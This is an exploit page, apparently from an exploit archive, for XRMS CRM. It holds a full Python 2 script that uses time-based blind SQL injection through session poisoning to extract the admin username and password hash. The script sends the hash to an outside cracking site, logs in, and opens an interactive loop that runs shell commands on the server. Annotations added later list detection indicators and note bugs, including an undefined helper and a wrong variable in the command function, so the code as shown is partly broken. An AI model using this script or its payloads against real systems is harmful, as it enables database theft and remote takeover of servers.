
XRMS Blind SQL Injection / Command Execution

XRMS Blind SQL Injection / Command Execution
Posted Aug 28, 2014
Authored by Benjamin Harris

XRMS blind SQL injection exploit that leverages $_SESSION poisoning and achieves remote command execution.

tags | exploit, remote, sql injection
SHA-256 | 22da305ed8f31ea31597071bebb8862e1bbef05d26a2868faaa7c5cd07486cbe

XRMS Blind SQL Injection / Command Execution

#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################

import urllib
import urllib2
import time
import sys

# Candidate alphabet for the character-by-character extraction loops in
# username() and password(). The two lists are parallel: usercharac[f] is the
# printable character and userascii[f] its ASCII code (a-z, '@', '.', '_',
# '-', '1'-'9', '0'), so they must stay index-aligned.
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
    """Print the ASCII-art banner to stdout (Python 2 print statement; no return value)."""
    print """ ____
/ __/_ ______ _ _ ___________ ___ _____
/ /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
/ __/ /_/ / /_/ / _> </ / / / / / / (__ )
/_/ \__,_/\__, (_)_/|_/_/ /_/ /_/ /_/____/
/_/
[+] fuq th3 w0rld, fuq ur m0m!\n"""

def usage():
    """Print the usage text and terminate the interpreter via the quit() builtin.

    Never returns: the caller (the top-level argv check) relies on quit()
    raising SystemExit.
    """
    print " [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
    print " [+] Example:"
    print " [+] python " + sys.argv[0] + " domain.to/xrms"
    quit()

def sendhashaway(hash):
    """Submit an MD5 hex digest to a third-party lookup site and return the plaintext it reports.

    Args:
        hash: MD5 hex digest (the value assembled from password() by the caller).
            Note the parameter shadows the builtin `hash`.

    Returns:
        Whatever getpositions() extracts between the first '<td><small><strong>'
        and '</strong>' in the response body.

    Notes:
        - getpositions() is not defined anywhere on this page; as shown, this
          call fails with NameError unless it is provided elsewhere.
        - The digest leaves the operator's machine over plain HTTP to an
          external service. From the defender's side an outbound request to
          icrackhash.com carrying an `mdhash=` query parameter is an indicator
          worth logging on egress proxies.
    """
    print " [+] Sending hash to icrackhash.com to be cracked."
    data = None
    headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
    url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
    gh = urllib2.Request(url,data,headers)
    gh2 = urllib2.urlopen(gh)
    output = gh2.read()
    plaintext = getpositions(output,'<td><small><strong>','</strong>')
    print " [-] Plaintext of hash: " +plaintext + "\n"
    return plaintext

def username(length):
    """Recover the `username` column of the first `users` row, one character at a time.

    Time-based blind SQL injection. For each position 1..length and each
    candidate in `userascii`, the injected IF(SUBSTRING(...)=CHAR(...),
    BENCHMARK(...), NULL) payload is POSTed as `user_id` to
    plugins/webform/new-form.php (per the file header, the value is kept in
    the PHP session), then a HEAD to plugins/useradmin/fingeruser.php is sent
    with that session id re-labelled as the `XRMS` cookie. A response slower
    than one second is read as "this candidate matches".

    Args:
        length: number of characters to recover (from getusernamelength()).

    Returns:
        list of single-character strings in position order; the caller joins them.

    Uses the module-level `domain` global (set from sys.argv[1] at the bottom
    of the file); it is not a parameter.

    Defender notes: every probe carries `UNION ALL SELECT` and `BENCHMARK(`
    in the `user_id` POST body and is followed by a HEAD request with an
    `XRMS=` cookie, so web-log alerting on those tokens catches the whole
    extraction phase; the root-cause fix is parameterised queries and never
    building SQL from session data that originated in a request parameter.
    """
    length = length + 1
    duser = []
    #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
    # (presumably the column-count probe behind the 8-column UNION below)
    found = 0
    i = 1
    payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
    payload2 = ",1)=CHAR("
    payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
    for i in range(1,length):
        found = 0
        while(found != 1):
            for f in range(0,len(userascii)):
                # Redefined on every iteration: a redirect handler that hands
                # back the 3xx response unchanged so its headers (Set-Cookie)
                # can be read, and a Request subclass that forces POST.
                class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
                    def http_error_302(self, req, fp, code, msg, headers):
                        infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
                        infourl.status = code
                        infourl.code = code
                        return infourl
                    http_error_300 = http_error_302
                class HeadRequest(urllib2.Request):
                    def get_method(self):
                        return "POST"
                payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
                data = urllib.urlencode([('user_id',payload)])
                url = 'http://'+domain+'/plugins/webform/new-form.php'
                opener = urllib2.build_opener(LeHTTPRedirectHandler)
                req = HeadRequest(url,data)
                prepare = opener.open(req)
                cookie1 = prepare.info()
                # Cut the PHPSESSID line out of the response headers, drop its
                # last 9 characters (presumably a "; path=/" style suffix — not
                # verifiable here) and replace the 9-character name with XRMS.
                cookie2pos1 = str(cookie1).find('PHPSESSID')
                cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
                line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
                line = 'XRMS' + line[9:]
                url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
                headers = { 'Cookie' : line }
                data = None
                start = time.time()
                get = urllib2.Request(url,data,headers)
                get.get_method = lambda: 'HEAD'
                try:
                    execute = urllib2.urlopen(get)
                except:
                    # Bare except: HTTPError and network failures are ignored;
                    # only the wall-clock delay measured below is used.
                    pass
                elapsed = (time.time() - start)
                # Timing oracle. Any delay above 1 s, including network
                # jitter, is taken as the BENCHMARK branch; the for-loop does
                # not break on a hit, so a later candidate in the same pass can
                # append a second character for the same position.
                if(elapsed > 1):
                    print " Character found. Character is: " + usercharac[f]
                    duser.append(usercharac[f])
                    found = 1
    return duser

def getusernamelength():
    """Find the length of the `username` column of the first `users` row.

    Same time-based oracle as username(): starting at 1 and counting up, the
    payload IF(LENGTH(username) = '<i>', BENCHMARK(...), NULL) is POSTed as
    `user_id` to plugins/webform/new-form.php, then a HEAD to
    plugins/useradmin/fingeruser.php is timed with the session id sent as
    the `XRMS` cookie. The first `i` whose response takes over one second is
    returned.

    Returns:
        int length. There is no upper bound on the loop: if no probe ever
        exceeds the threshold the function never returns.

    Uses the module-level `domain` global; it is not a parameter.
    Defender note: the same `user_id` / `BENCHMARK(` / `XRMS=` cookie pattern
    described on username() applies here, one request pair per candidate length.
    """
    found = 0
    i = 1
    payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
    payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
    while (found != 1):
        # Rebuilt each iteration: redirect handler that returns the 3xx
        # response as-is (so Set-Cookie is readable) and a POST-forcing Request.
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
            def http_error_302(self, req, fp, code, msg, headers):
                infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
                infourl.status = code
                infourl.code = code
                return infourl
            http_error_300 = http_error_302
        class HeadRequest(urllib2.Request):
            def get_method(self):
                return "POST"
        payload = payload1 + str(i) + payload2
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        # Extract the PHPSESSID header line, trim its last 9 characters
        # (presumably a cookie-attribute suffix — not verifiable here) and
        # swap the 9-character cookie name for XRMS.
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
            execute = urllib2.urlopen(get)
        except:
            # Bare except: errors from the HEAD request are discarded; only
            # the elapsed time matters.
            pass
        elapsed = (time.time() - start)
        # Timing oracle: more than 1 s is read as the BENCHMARK branch, which
        # also means any slow response is misread as the answer.
        if(elapsed > 1):
            print " Length found at position: " + str(i)
            found = 1
            length = i
            return length
        i = i + 1

def password(length):
    """Recover the `password` column of the first `users` row, one character at a time.

    Identical in structure to username() (same endpoints, cookie relabelling
    and one-second timing oracle) but the injected SUBSTRING() reads the
    `password` column. The caller passes 32, the length of an MD5 hex digest;
    hex digits are covered by `usercharac`.

    Args:
        length: number of characters to recover.

    Returns:
        list of single-character strings in position order.

    Uses the module-level `domain` global; it is not a parameter.
    Defender note: see username() — the `user_id` POST body containing
    `BENCHMARK(` followed by a HEAD with an `XRMS=` cookie is the signature of
    this phase as well, repeated for up to 40 candidates per position.
    """
    length = length + 1
    dpassword = []
    #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
    # (presumably the column-count probe behind the 8-column UNION below)
    found = 0
    i = 1
    payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
    payload2 = ",1)=CHAR("
    payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
    for i in range(1,length):
        found = 0
        while(found != 1):
            for f in range(0,len(userascii)):
                # Redefined on every iteration: redirect handler that returns
                # the 3xx response unchanged (so Set-Cookie can be read) and a
                # Request subclass that forces POST.
                class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
                    def http_error_302(self, req, fp, code, msg, headers):
                        infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
                        infourl.status = code
                        infourl.code = code
                        return infourl
                    http_error_300 = http_error_302
                class HeadRequest(urllib2.Request):
                    def get_method(self):
                        return "POST"
                payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
                data = urllib.urlencode([('user_id',payload)])
                url = 'http://'+domain+'/plugins/webform/new-form.php'
                opener = urllib2.build_opener(LeHTTPRedirectHandler)
                req = HeadRequest(url,data)
                prepare = opener.open(req)
                cookie1 = prepare.info()
                # Cut the PHPSESSID header line out, trim its last 9 characters
                # (presumably a cookie-attribute suffix — not verifiable here)
                # and replace the 9-character name with XRMS.
                cookie2pos1 = str(cookie1).find('PHPSESSID')
                cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
                line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
                line = 'XRMS' + line[9:]
                url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
                headers = { 'Cookie' : line }
                data = None
                start = time.time()
                get = urllib2.Request(url,data,headers)
                get.get_method = lambda: 'HEAD'
                try:
                    execute = urllib2.urlopen(get)
                except:
                    # Bare except: HTTPError and network failures are ignored;
                    # only the measured delay is used.
                    pass
                elapsed = (time.time() - start)
                # Timing oracle (> 1 s). Jitter is misread as a hit, and the
                # for-loop does not break on one, so a position can receive
                # more than one character in the same pass.
                if(elapsed > 1):
                    print " Character found. Character is: " + usercharac[f]
                    dpassword.append(usercharac[f])
                    found = 1
    return dpassword

def login(domain,user,password):
    """POST the recovered credentials to login-2.php using a fixed, client-chosen XRMS cookie.

    Args:
        domain: host (optionally with a path prefix) as given on the command line.
        user: account name assembled from username().
        password: plaintext returned by sendhashaway().

    Returns:
        None. Prints " [+] Logged In" when the response body contains
        'PEAR.php' (presumably a marker of the post-login page — not
        verifiable from this file); otherwise it prints nothing and the caller
        proceeds regardless.

    Defender note: the session id here is not issued by the server but chosen
    by the client, and commandexec() reuses the same value afterwards — the
    script assumes the application accepts an arbitrary session id and keeps
    it across authentication. Regenerating the session id on login and
    rejecting unknown ids removes that assumption.
    """
    cookie = "XRMS=iseeurgettinown4d"
    url = 'http://'+domain+'/login-2.php'
    headers = { 'Cookie' : cookie }
    data = urllib.urlencode([('username',user),('password',password)])
    a1 = urllib2.Request(url,data,headers)
    a2 = urllib2.urlopen(a1)
    output = a2.read()
    if output.find('PEAR.php') > 0:
        print " [+] Logged In"

def commandexec(domain,command):
    """Intended to pass `command` through the `username` query parameter of fingeruser.php and return its output.

    The command is wrapped as "; echo '0x41';<command>;echo '14x0';" so the
    output can be cut out of the response body between the two markers; the
    fixed XRMS cookie set up by login() is reused.

    Args:
        domain: host (optionally with a path prefix).
        command: shell string typed by the operator; sent without any escaping.

    Returns:
        The response text between the markers, with 4 characters trimmed
        after '0x41' and before '14x0'.

    Defender note: this is where request data reaches a shell on the server.
    The fix is never to interpolate the `username` parameter into a command
    (argument lists, strict allow-list validation); in access logs a
    `username=` value containing `;` or `echo` is an unambiguous indicator.
    """
    cookie = "XRMS=iseeurgettinown4d"
    # urlencode of a (key, None) pair yields "<encoded key>=None"; the key is
    # the marker-wrapped command.
    cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
    headers = { 'Cookie' : cookie }
    data = None
    url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
    b1 = urllib2.Request(url,data,headers)
    b2 = urllib2.urlopen(a1)
    output = b2.read()
    first = output.find('0x41') + 4
    last = output.find('14x0') - 4
    return output[first:last]

# --- script entry: runs on import, there is no __name__ == "__main__" guard ---
banner()
if len(sys.argv) < 2:
    usage()
# Target host (optionally with a path prefix). Read as a global by
# getusernamelength(), username() and password(); passed explicitly to
# login() and commandexec().
domain = sys.argv[1]
print " [+] Grabbing username length"
length = getusernamelength()
print " [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print " [+] Grabbing password hash"
# 32 = length of an MD5 hex digest, the assumed format of the password column.
tmppass = password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print " [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
# Interactive loop. `quit` is the site builtin until it is rebound to 1 on
# the word "quit", which is what terminates the loop.
while(quit != 1):
    cmd = raw_input(' [+] Run a command: ')
    if cmd == 'quit':
        print " [-] Hope you had fun :)"
        quit = 1
    if cmd != 'quit':
        print " [+] "+ commandexec(domain,cmd)

